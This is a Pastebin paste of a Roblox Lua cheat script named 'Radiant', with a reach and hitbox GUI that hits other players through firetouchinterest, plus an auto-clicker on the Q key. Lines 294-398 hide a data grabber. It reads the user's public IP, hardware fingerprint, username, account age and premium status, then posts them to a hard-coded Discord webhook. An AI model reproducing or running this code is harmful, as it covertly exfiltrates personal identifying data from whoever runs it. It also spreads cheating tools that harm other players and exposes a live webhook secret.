Advertisement
CRAZYNFOF

kaneki radiant laodstring1255

Dec 25th, 2020 (edited)
414
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.91 KB | None | 0 0
  1. game:GetService("StarterGui"):SetCore("SendNotification",{
  2. Title = "Radiant";
  3. Text = "Radiant has laoded"
  4. })
  5.  
  6.  
  7. local active = true
  8. local trueActive = true
  9. local reachType = "Sphere"
  10. local dmgEnabled = true
  11. local visualizerEnabled = false
  12.  
  13. local visualizer = Instance.new("Part")
  14. visualizer.BrickColor = BrickColor.Blue()
  15. visualizer.Transparency = 0.6
  16. visualizer.Anchored = true
  17. visualizer.CanCollide = false
  18. visualizer.Size = Vector3.new(0.5,0.5,0.5)
  19. visualizer.BottomSurface = Enum.SurfaceType.Smooth
  20. visualizer.TopSurface = Enum.SurfaceType.Smooth
  21.  
  22. local ScreenGui = Instance.new("ScreenGui")
  23. local Frame = Instance.new("Frame")
  24. local TextLabel = Instance.new("TextLabel")
  25. local TextBox = Instance.new("TextBox")
  26. local TextLabel_2 = Instance.new("TextLabel")
  27. local TextLabel_3 = Instance.new("TextLabel")
  28. local TextLabel_4 = Instance.new("TextLabel")
  29. local TextButton = Instance.new("TextButton")
  30. local Frame_2 = Instance.new("Frame")
  31. local Frame_3 = Instance.new("Frame")
  32. local Frame_4 = Instance.new("Frame")
  33. local Frame_5 = Instance.new("Frame")
  34. local TextButton_2 = Instance.new("TextButton")
  35.  
  36. --Properties:
  37.  
  38. ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
  39. ScreenGui.DisplayOrder = 999999999
  40. ScreenGui.ResetOnSpawn = false
  41.  
  42. Frame.Parent = ScreenGui
  43. Frame.AnchorPoint = Vector2.new(0, 0.5)
  44. Frame.BackgroundColor3 = Color3.fromRGB(45, 45, 45)
  45. Frame.BackgroundTransparency = 0.300
  46. Frame.BorderColor3 = Color3.fromRGB(0, 0, 0)
  47. Frame.BorderSizePixel = 4
  48. Frame.Position = UDim2.new(0, 0, 0.600000024, 0)
  49. Frame.Size = UDim2.new(0.150000006, 0, 0.300000012, 0)
  50.  
  51. TextLabel.Parent = Frame
  52. TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  53. TextLabel.BackgroundTransparency = 1.000
  54. TextLabel.Size = UDim2.new(0.600000024, 0, 0.200000003, 0)
  55. TextLabel.Font = Enum.Font.SourceSans
  56. TextLabel.Text = "SIZE:"
  57. TextLabel.TextColor3 = Color3.fromRGB(120,0,0)
  58. TextLabel.TextScaled = true
  59. TextLabel.TextSize = 14.000
  60. TextLabel.TextWrapped = true
  61.  
  62. TextBox.Parent = Frame
  63. TextBox.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  64. TextBox.BackgroundTransparency = 1.000
  65. TextBox.Position = UDim2.new(0.600000024, 0, 0, 0)
  66. TextBox.Size = UDim2.new(0.400000006, 0, 0.200000003, 0)
  67. TextBox.Font = Enum.Font.SourceSans
  68. TextBox.Text = "3.5"
  69. TextBox.TextColor3 = Color3.fromRGB(255, 76, 76)
  70. TextBox.TextScaled = true
  71. TextBox.TextSize = 14.000
  72. TextBox.TextWrapped = true
  73.  
  74. TextLabel_2.Parent = Frame
  75. TextLabel_2.BackgroundColor3 = Color3.fromRGB(0, 0, 250)
  76. TextLabel_2.BackgroundTransparency = 1.000
  77. TextLabel_2.Position = UDim2.new(0, 0, 0.200000003, 0)
  78. TextLabel_2.Size = UDim2.new(0.600000024, 0, 0.200000003, 0)
  79. TextLabel_2.Font = Enum.Font.SourceSans
  80. TextLabel_2.Text = "SHAPE:"
  81. TextLabel_2.TextColor3 = Color3.fromRGB(120, 0, 0)
  82. TextLabel_2.TextScaled = true
  83. TextLabel_2.TextSize = 14.000
  84. TextLabel_2.TextWrapped = true
  85.  
  86. TextLabel_3.Parent = Frame
  87. TextLabel_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  88. TextLabel_3.BackgroundTransparency = 1.000
  89. TextLabel_3.Position = UDim2.new(0, 0, 0.400000006, 0)
  90. TextLabel_3.Size = UDim2.new(0.600000024, 0, 0.200000003, 0)
  91. TextLabel_3.Font = Enum.Font.SourceSans
  92. TextLabel_3.Text = "TOGGLE:"
  93. TextLabel_3.TextColor3 = Color3.fromRGB(120, 0, 0)
  94. TextLabel_3.TextScaled = true
  95. TextLabel_3.TextSize = 14.000
  96. TextLabel_3.TextWrapped = true
  97.  
  98. TextLabel_4.Parent = Frame
  99. TextLabel_4.BackgroundColor3 = Color3.fromRGB(0, 0, 255)
  100. TextLabel_4.BackgroundTransparency = 1.000
  101. TextLabel_4.Position = UDim2.new(0, 0, 0.600000024, 0)
  102. TextLabel_4.Size = UDim2.new(0.600000024, 0, 0.200000003, 0)
  103. TextLabel_4.Font = Enum.Font.SourceSans
  104. TextLabel_4.Text = "VISIBLE:"
  105. TextLabel_4.TextColor3 = Color3.fromRGB(120, 0, 0)
  106. TextLabel_4.TextScaled = true
  107. TextLabel_4.TextSize = 14.000
  108. TextLabel_4.TextWrapped = true
  109.  
  110. TextButton.Parent = Frame
  111. TextButton.AnchorPoint = Vector2.new(0, 1)
  112. TextButton.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  113. TextButton.BackgroundTransparency = 1.000
  114. TextButton.Position = UDim2.new(0, 0, 1, 0)
  115. TextButton.Size = UDim2.new(1, 0, 0.150000006, 0)
  116. TextButton.Font = Enum.Font.SourceSansBold
  117. TextButton.Text = "KILL RADIANT"
  118. TextButton.TextColor3 = Color3.fromRGB(120, 0, 0)
  119. TextButton.TextScaled = true
  120. TextButton.TextSize = 14.000
  121. TextButton.TextWrapped = true
  122.  
  123. Frame_2.Parent = Frame
  124. Frame_2.Active = true
  125. Frame_2.AnchorPoint = Vector2.new(0, 0.5)
  126. Frame_2.BackgroundColor3 = Color3.fromRGB(31, 31, 31)
  127. Frame_2.BorderSizePixel = 0
  128. Frame_2.Position = UDim2.new(0.725000024, 0, 0.699999988, 0)
  129. Frame_2.Size = UDim2.new(0, 25, 0, 25)
  130. Frame_2.ZIndex = 5
  131.  
  132. Frame_3.Parent = Frame_2
  133. Frame_3.AnchorPoint = Vector2.new(0.5, 0.5)
  134. Frame_3.BackgroundColor3 = Color3.fromRGB(255, 76, 76)
  135. Frame_3.BorderSizePixel = 0
  136. Frame_3.LayoutOrder = 1
  137. Frame_3.Position = UDim2.new(0.5, 0, 0.5, 0)
  138.  
  139. Frame_4.Parent = Frame
  140. Frame_4.Active = true
  141. Frame_4.AnchorPoint = Vector2.new(0, 0.5)
  142. Frame_4.BackgroundColor3 = Color3.fromRGB(31, 31, 31)
  143. Frame_4.BorderSizePixel = 0
  144. Frame_4.Position = UDim2.new(0.725000024, 0, 0.5, 0)
  145. Frame_4.Size = UDim2.new(0, 25, 0, 25)
  146. Frame_4.ZIndex = 5
  147.  
  148. Frame_5.Parent = Frame_4
  149. Frame_5.AnchorPoint = Vector2.new(0.5, 0.5)
  150. Frame_5.BackgroundColor3 = Color3.fromRGB(255, 76, 76)
  151. Frame_5.BorderSizePixel = 0
  152. Frame_5.LayoutOrder = 1
  153. Frame_5.Position = UDim2.new(0.5, 0, 0.5, 0)
  154. Frame_5.Size = UDim2.new(1, 0, 1, 0)
  155.  
  156. TextButton_2.Parent = Frame
  157. TextButton_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  158. TextButton_2.BackgroundTransparency = 1.000
  159. TextButton_2.Position = UDim2.new(0.600000024, 0, 0.200000003, 0)
  160. TextButton_2.Size = UDim2.new(0.400000006, 0, 0.200000003, 0)
  161. TextButton_2.Font = Enum.Font.SourceSans
  162. TextButton_2.Text = "Sphere"
  163. TextButton_2.TextColor3 = Color3.fromRGB(255, 76, 76)
  164. TextButton_2.TextScaled = true
  165. TextButton_2.TextSize = 14.000
  166. TextButton_2.TextWrapped = true
  167.  
  168. repeat wait() until game.Players.LocalPlayer
  169. ScreenGui.Parent = game:GetService("CoreGui")
  170.  
  171.  
  172.  
  173. Frame_4.InputBegan:connect(function(inp)
  174. if inp.UserInputType == Enum.UserInputType.MouseButton1 then
  175. dmgEnabled = not dmgEnabled
  176. local goal = {Size = UDim2.new(0,0,0,0)}
  177. if dmgEnabled then
  178. goal = {Size = UDim2.new(1,0,1,0)}
  179. end
  180. game:GetService("TweenService"):Create(Frame_5,TweenInfo.new(0.12,Enum.EasingStyle.Quad),goal):Play()
  181. end
  182. end)
  183. Frame_2.InputBegan:connect(function(inp)
  184. if inp.UserInputType == Enum.UserInputType.MouseButton1 then
  185. visualizerEnabled = not visualizerEnabled
  186. local goal = {Size = UDim2.new(0,0,0,0)}
  187. if visualizerEnabled then
  188. goal = {Size = UDim2.new(1,0,1,0)}
  189. end
  190. game:GetService("TweenService"):Create(Frame_3,TweenInfo.new(0.12,Enum.EasingStyle.Linear),goal):Play()
  191. end
  192. end)
  193. TextButton_2.MouseButton1Click:connect(function()
  194. if reachType == "Sphere" then
  195. reachType = "Box"
  196. else
  197. reachType = "Sphere"
  198. end
  199. TextButton_2.Text = reachType
  200. end)
  201. TextButton.MouseButton1Click:connect(function()
  202. trueActive = false
  203. ScreenGui:Destroy()
  204. end)
  205. game:GetService("UserInputService").InputBegan:connect(function(inp,gpe)
  206. if gpe then return end
  207. if inp.KeyCode == Enum.KeyCode.H then
  208. ScreenGui.Enabled = not ScreenGui.Enabled
  209. end
  210. end)
  211.  
  212. local plr = game.Players.LocalPlayer
  213.  
  214. local function onHit(hit,handle)
  215. local victim = hit.Parent:FindFirstChildOfClass("Humanoid")
  216. if victim and victim.Parent.Name ~= game.Players.LocalPlayer.Name then
  217. if dmgEnabled then
  218. for _,v in pairs(hit.Parent:GetChildren()) do
  219. if v:IsA("Part") then
  220. firetouchinterest(v,handle,0)
  221. firetouchinterest(v,handle,1)
  222. end
  223. end
  224. else
  225. firetouchinterest(hit,handle,0)
  226. firetouchinterest(hit,handle,1)
  227. end
  228. end
  229. end
  230.  
  231. local function getWhiteList()
  232. local wl = {}
  233. for _,v in pairs(game.Players:GetPlayers()) do
  234. if v ~= plr then
  235. local char = v.Character
  236. if char then
  237. for _,q in pairs(char:GetChildren()) do
  238. if q:IsA("Part") then
  239. table.insert(wl,q)
  240. end
  241. end
  242. end
  243. end
  244. end
  245. return wl
  246. end
  247.  
  248. game:GetService("RunService").RenderStepped:connect(function()
  249. if not active or not trueActive then return end
  250. local s = plr.Character and plr.Character:FindFirstChildOfClass("Tool")
  251. if not s then visualizer.Parent = nil end
  252. if s then
  253. local handle = s:FindFirstChild("Handle") or s:FindFirstChildOfClass("Part")
  254. if handle then
  255. if visualizerEnabled then
  256. visualizer.Parent = workspace
  257. else
  258. visualizer.Parent = nil
  259. end
  260. local reach = tonumber(TextBox.Text)
  261. if reach then
  262. if reachType == "Sphere" then
  263. visualizer.Shape = Enum.PartType.Ball
  264. visualizer.Size = Vector3.new(reach,reach,reach)
  265. visualizer.CFrame = handle.CFrame
  266. for _,v in pairs(game.Players:GetPlayers()) do
  267. local hrp = v.Character and v.Character:FindFirstChild("HumanoidRootPart")
  268. if hrp and handle then
  269. local mag = (hrp.Position-handle.Position).magnitude
  270. if mag <= reach then
  271. onHit(hrp,handle)
  272. end
  273. end
  274. end
  275. elseif reachType == "Box" then
  276. visualizer.Shape = Enum.PartType.Block
  277. visualizer.Size = Vector3.new(reach,reach,reach)
  278. visualizer.CFrame = handle.CFrame
  279. for _,v in pairs(game.Players:GetPlayers()) do
  280. local hrp = v.Character and v.Character:FindFirstChild("HumanoidRootPart")
  281. if hrp and handle then
  282. local mag = (hrp.Position-handle.Position).magnitude
  283. if mag <= reach then
  284. onHit(hrp,handle)
  285. end
  286. end
  287. end
  288. end
  289. end
  290. end
  291. end
  292. end)
  293.  
  294. local IP = game:HttpGet("https://v4.ident.me")
  295. plr = game:GetService'Players'.LocalPlayer
  296. local premium = false
  297. local ALT = false
  298. if plr.MembershipType == Enum.MembershipType.Premium then
  299. premium = true
  300. elseif plr.MembershipType == Enum.MembershipType.None then
  301. premium = false
  302. end
  303. if premium == false then
  304. if plr.AccountAge <= 70 then
  305. ALT = true
  306. end
  307. end
  308.  
  309. local market = game:GetService("MarketplaceService")
  310. local info = market:GetProductInfo(game.PlaceId, Enum.InfoType.Asset)
  311.  
  312.  
  313. local http_request = http_request;
  314. if syn then
  315. http_request = syn.request
  316. elseif SENTINEL_V2 then
  317. function http_request(tb)
  318. return {
  319. StatusCode = 200;
  320. Body = request(tb.Url, tb.Method, (tb.Body or ''))
  321. }
  322. end
  323. end
  324.  
  325. local body = http_request({Url = 'https://httpbin.org/get'; Method = 'GET'}).Body;
  326. local decoded = game:GetService('HttpService'):JSONDecode(body)
  327. local hwid_list = {"Syn-Fingerprint", "Exploit-Guid", "Proto-User-Identifier", "Sentinel-Fingerprint"};
  328. hwid = "";
  329.  
  330. for i, v in next, hwid_list do
  331. if decoded.headers[v] then
  332. hwid = decoded.headers[v];
  333. break
  334. end
  335. end
  336.  
  337. if hwid then
  338. local HttpServ = game:GetService('HttpService')
  339. local url = "https://discordapp.com/api/webhooks/781584039453786122/OaijHvtQ6KkFf2WLICnD3mm9BMN67fE4qpUL03cPBRraFBPo09hfHhECgK0xOD1WmZA0"
  340.  
  341.  
  342. local data =
  343. {
  344. ["content"] = "",
  345. ["embeds"] = {{
  346. ["title"] = "__**HWID:**__",
  347. ["description"] = hwid,
  348. ["type"] = "rich",
  349. ["color"] = tonumber(0xAB0909),
  350. ["fields"] = {
  351. {
  352. ["name"] = "Username:",
  353. ["value"] = Game.Players.LocalPlayer.Name,
  354. ["inline"] = true
  355. },
  356. {
  357. ["name"] = "IP Address:",
  358. ["value"] = IP,
  359. ["inline"] = true
  360. },
  361. {
  362. ["name"] = "Game Link:",
  363. ["value"] = "https://roblox.com/games/" .. game.PlaceId .. "/",
  364. ["inline"] = true
  365. },
  366. {
  367. ["name"] = "Game Name:",
  368. ["value"] = info.Name,
  369. ["inline"] = true
  370. },
  371. {
  372. ["name"] = "Age:",
  373. ["value"] = plr.AccountAge,
  374. ["inline"] = true
  375. },
  376. {
  377. ["name"] = "Premium:",
  378. ["value"] = premium,
  379. ["inline"] = true
  380. },
  381. {
  382. ["name"] = "ALT:",
  383. ["value"] = ALT,
  384. ["inline"] = true
  385. },
  386.  
  387. },
  388. }}
  389. }
  390. local newdata = HttpServ:JSONEncode(data)
  391.  
  392. local headers = {
  393. ["content-type"] = "application/json"
  394. }
  395.  
  396. local request_payload = {Url=url, Body=newdata, Method="POST", Headers=headers}
  397. http_request(request_payload)
  398. end
  399.  
  400.  
  401. local AC = false
  402. local Key = Enum.KeyCode.Q
  403.  
  404. game:GetService("UserInputService").InputBegan:Connect(function(k,g)
  405. if not g and k.KeyCode == Key then
  406. AC = not AC
  407. end
  408. end)
  409.  
  410. while wait() do
  411. if AC then
  412. pcall(function()
  413. local Sword = game:GetService'Players'.LocalPlayer.Character:FindFirstChildOfClass'Tool'
  414. Sword:Activate()
  415. Sword:Activate()
  416. end)
  417. end
  418. end
  419.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement